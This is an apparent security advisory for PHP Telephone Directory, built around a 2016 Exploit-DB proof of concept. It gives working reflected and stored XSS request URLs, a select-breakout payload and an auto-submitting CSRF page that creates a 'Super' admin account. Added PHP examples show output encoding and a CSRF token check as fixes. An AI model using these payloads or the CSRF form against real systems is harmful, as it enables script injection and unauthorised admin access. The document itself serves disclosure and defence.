Vendor: PHP Telephone Directory
By: larrycompress
CVSS: 7.5 (HIGH)
Reflected XSS and Stored XSS
CWE: 79
Product Name: PHP Telephone Directory
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
Year: 2016

PHP Telephone Directory – Multiple Vulnerabilities

PHP Telephone Directory is vulnerable to reflected XSS, stored XSS and CSRF. Reflected XSS: the 'key' search parameter is echoed unencoded both in the public search (index.php) and in the administration interface (administration.php, which requires a normal user login). Stored XSS: a logged-in user can store script through the new-contact form fields 'pointcode', 'contacttitle', 'firstname', 'lastname', 'middlename', 'employeeID', 'otherID', 'phonenumber1', 'internalphonenumber', 'phonenumber2', 'phonenumber3', 'fax', 'mobilecell', 'email', 'alternateemail', 'chat', 'website', 'socialmedia1', 'socialmedia2', 'socialmedia3', 'contactposition', 'company', 'qualifications', 'buildingroom', 'address', 'city', 'suburb', 'tdstate', 'zippostcode', 'country' and 'description', and through the 'departmentname' field of the new-department form, where the payload first closes the surrounding <select> element so that the injected <svg> tag is parsed as markup. The PoC also splits some payloads across two adjacent fields with a JavaScript block comment ('/*' in one field, '*/' in the next), so no single field has to hold the whole script. CSRF (CWE-352): administration.php accepts the 'saveuser' action without any anti-CSRF token, so a page that auto-submits a form to it can create a new user with the 'Super' access level in the session of a victim who is logged in to the administration interface.

Mitigation:

Apply output encoding for the HTML context wherever user-controlled data is written into a page: the reflected 'key' value on index.php and administration.php, and every stored contact and department field when it is displayed (in PHP, htmlspecialchars() with ENT_QUOTES on each value at the point of output). Input validation (phone, e-mail and date fields checked against their expected format) is useful defence in depth but does not replace encoding, since free-text fields such as 'description' legitimately contain arbitrary characters. For the CSRF issue, require a per-session anti-CSRF token on every state-changing administration.php request (saveuser, newcontact, newdepartment), accept those actions only via POST, and set the session cookie with SameSite=Lax or Strict as an additional layer.
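
The following is an added illustration, not code from PHP Telephone Directory (the application's source is not reproduced on this page). The *_vulnerable() functions reconstruct the pattern the PoC implies, the 'key' value and a stored department name written into HTML without encoding, and the *_safe() functions show the output-encoding fix. The function names are the example's own; the payloads are the ones used in the PoC below.

```php
<?php
declare(strict_types=1);

// Added example, not code from PHP Telephone Directory (its source is not
// on this page). The *_vulnerable() functions reconstruct the pattern the
// PoC implies: the 'key' search value and the stored department name are
// written into HTML without encoding. The *_safe() versions apply output
// encoding for the HTML text/attribute context. Function names are the
// example's own.

/** Encode a value for an HTML text node or a quoted attribute value. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Vulnerable: echoes the search key as-is into the page and the form. */
function render_search_vulnerable(string $key): string
{
    return "<p>Results for: {$key}</p>\n"
         . "<input type=\"text\" name=\"key\" value=\"{$key}\">";
}

/** Hardened: identical markup, but every interpolated value is encoded. */
function render_search_safe(string $key): string
{
    $k = h($key);
    return "<p>Results for: {$k}</p>\n"
         . "<input type=\"text\" name=\"key\" value=\"{$k}\">";
}

/**
 * Vulnerable: stored department names rendered inside a <select>.
 * The PoC payload starts with </select> because a browser ignores most
 * tags while parsing inside a <select>; closing it first makes the
 * following <svg> element live.
 */
function render_departments_vulnerable(array $names): string
{
    $out = "<select name=\"department\">\n";
    foreach ($names as $n) {
        $out .= "  <option value=\"{$n}\">{$n}</option>\n";
    }
    return $out . "</select>";
}

/** Hardened: encoding turns </select> into text, so no breakout occurs. */
function render_departments_safe(array $names): string
{
    $out = "<select name=\"department\">\n";
    foreach ($names as $n) {
        $e = h($n);
        $out .= "  <option value=\"{$e}\">{$e}</option>\n";
    }
    return $out . "</select>";
}

// Payloads copied from the advisory's PoC.
$reflectedPayload  = '<svg/onload=alert(1)>';
$departmentPayload = '</select><svg/onload=alert(1)><select>';

foreach ([
    'search (vulnerable)'      => render_search_vulnerable($reflectedPayload),
    'search (safe)'            => render_search_safe($reflectedPayload),
    'departments (vulnerable)' => render_departments_vulnerable([$departmentPayload]),
    'departments (safe)'       => render_departments_safe([$departmentPayload]),
] as $label => $html) {
    // A raw "<svg" left in the output means the payload survived as markup.
    $status = stripos($html, '<svg') === false ? 'encoded' : 'LIVE MARKUP';
    echo str_pad($label, 26), ": {$status}\n{$html}\n\n";
}
```

Run it with the PHP CLI. The hardened functions emit the payload as literal text (the angle brackets become &lt; and &gt;), which is why the same check reports "encoded" for them and "LIVE MARKUP" for the reconstructed vulnerable output. The same h() call belongs around every stored contact field listed above when it is displayed; encoding at output time, rather than stripping tags on input, is what keeps a field such as 'description' usable while removing the injection.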

Exploit-DB raw data:

# Exploit Title: PHP Telephone Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=2
# Software Link: http://www.pagereactions.com/downloads/phptelephonedirectory.zip
---------------------------------------------------------------------------------

PoC as follows:

# 0x00 Reflected XSS

---

1. In public search:

http://192.168.1.112/phptelephonedirectory/index.php?key=<svg/onload=alert(1)>

2. In the administration web interface (requires a normal user login):

http://192.168.1.112/phptelephonedirectory/administration.php?key=<svg/onload=alert(1)>

# 0x01 Stored XSS

---

1. In the administration web directory interface (requires a normal user login):

http://192.168.1.112/phptelephonedirectory/administration.php
?pageaction=newcontact
&subaction=submit
&id=1
&dtDOBDate=0000-00-00
&pointcode=<script>alert(1)/*
&contacttitle=*/</script>
&firstname=<script>alert(2)</script>
&lastname=<script>alert(3)</script>
&middlename=<script>alert(4)</script>
&DOBdateradio=usenew
&dateday=16
&datemonthnewedit=10
&dateyearnewedit=2015
&employeeID=<script>alert(5)/*
&otherID=*/</script>
&phonenumber1=<script>alert(6)</script>
&internalphonenumber=<script>alert(7)</script>
&phonenumber2=<script>alert(8)</script>
&phonenumber3=<script>alert(9)</script>
&fax=<script>alert(10)</script>
&mobilecell=<script>alert(11)</script>
&email=<script>alert(12)</script>
&alternateemail=<script>alert(13)</script>
&chat=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&contactposition=<script>alert(19)</script>
&company=<script>alert(20)</script>
&qualifications=<script>alert(21)</script>
&departmentnewedit=
&buildingroom=<script>alert(22)</script>
&address=<script>alert(23)</script>
&city=<script>alert(24)</script>
&suburb=<script>alert(25)</script>
&tdstate=<script>alert(26)</script>
&zippostcode=<script>alert(27)/*
&country=*/</script><script>alert(28)</script>
&description=<script>alert(29)</script>
&recordstatus=active

2. In the administration web department interface (requires a normal user login):

http://192.168.1.112/phptelephonedirectory/administration.php?pageaction=newdepartment&subaction=submit&departmentname=</select><svg/onload=alert(1)><select>

# 0x02 CSRF (add Super user)

---

In http://192.168.1.103/csrf.html:

<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.112/phptelephonedirectory/administration.php" method="POST">
      <input name="pageaction" value="saveuser" type="hidden" />
      <input name="subaction" value="submit" type="hidden" />
      <input name="username" value="larry_csrf" type="hidden" />
      <input name="password" value="larry_csrf" type="hidden" />
      <input name="userfullname" value="larry_csrf" type="hidden" />
      <input name="accesslevel" value="Super" type="hidden" />
      <input name="userstatus" value="active" type="hidden" />
      <input name="mysubmit" value="submit" type="submit" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

* Thanks to Besim *
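
Added example, not code from PHP Telephone Directory or from the advisory: the server-side check whose absence the csrf.html PoC above exploits. It implements a per-session synchronizer token that every state-changing administration.php action seen in the PoC (saveuser, newcontact, newdepartment) must carry, and rejects those actions over GET. The function names, the 'csrf_token' field name and the plain arrays standing in for $_SESSION and $_POST are the example's own assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not code from PHP Telephone Directory. Demonstrates the
// synchronizer-token check that would stop the csrf.html PoC: the forged
// form cannot include a token it has no way to read. Function names, the
// field name 'csrf_token', and the arrays used in place of $_SESSION and
// $_POST are this example's assumptions.

const CSRF_FIELD = 'csrf_token';

/** Return the session's CSRF token, generating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session[CSRF_FIELD]) || !is_string($session[CSRF_FIELD])) {
        $session[CSRF_FIELD] = bin2hex(random_bytes(32)); // 256 bits from the CSPRNG
    }
    return $session[CSRF_FIELD];
}

/** Hidden field to embed in every form that changes state. */
function csrf_field(array &$session): string
{
    $t = htmlspecialchars(csrf_token($session), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="' . $t . '">';
}

/**
 * Gate for state-changing actions: the request must be a POST and carry a
 * token equal to the session's. hash_equals() avoids a timing side channel
 * in the comparison. GET is rejected because the stored-XSS PoC shows
 * administration.php accepting newcontact submissions via GET.
 */
function csrf_valid(array $session, array $post, string $method): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session[CSRF_FIELD] ?? '';
    $given    = $post[CSRF_FIELD] ?? '';
    return is_string($expected) && $expected !== ''
        && is_string($given) && hash_equals($expected, $given);
}

/** Minimal dispatcher showing where the check belongs: before any write. */
function handle_admin_request(array &$session, array $post, string $method): string
{
    $action   = $post['pageaction'] ?? '';
    $mutating = ['saveuser', 'newcontact', 'newdepartment'];
    if (in_array($action, $mutating, true) && !csrf_valid($session, $post, $method)) {
        return "403: missing or invalid CSRF token for action '{$action}'";
    }
    // ... the real handlers would save the user/contact/department here ...
    return "accepted action '{$action}'";
}

// --- demonstration ---
$session  = [];
$formHtml = csrf_field($session); // the legitimate page renders this field

// Request posted from the legitimate form: carries the session token.
$legit = [
    'pageaction' => 'saveuser', 'subaction' => 'submit',
    'username' => 'alice', 'accesslevel' => 'Super',
    CSRF_FIELD => $session[CSRF_FIELD],
];

// Request shaped exactly like the PoC's csrf.html: no token field at all.
$forged = [
    'pageaction' => 'saveuser', 'subaction' => 'submit',
    'username' => 'larry_csrf', 'password' => 'larry_csrf',
    'userfullname' => 'larry_csrf', 'accesslevel' => 'Super',
    'userstatus' => 'active', 'mysubmit' => 'submit',
];

echo $formHtml, "\n";
echo handle_admin_request($session, $legit, 'POST'), "\n";
echo handle_admin_request($session, $forged, 'POST'), "\n";
echo handle_admin_request($session, $legit, 'GET'), "\n";
```

In the real application the token would live in $_SESSION, the check would run on $_POST and $_SERVER['REQUEST_METHOD'] at the top of administration.php before the pageaction dispatch, and the session cookie would additionally be issued with SameSite=Lax or Strict. The token on its own does not help while the stored and reflected XSS above remain, because script running in the victim's origin can read the token out of the page and submit it; the XSS fix and the CSRF fix need to ship together.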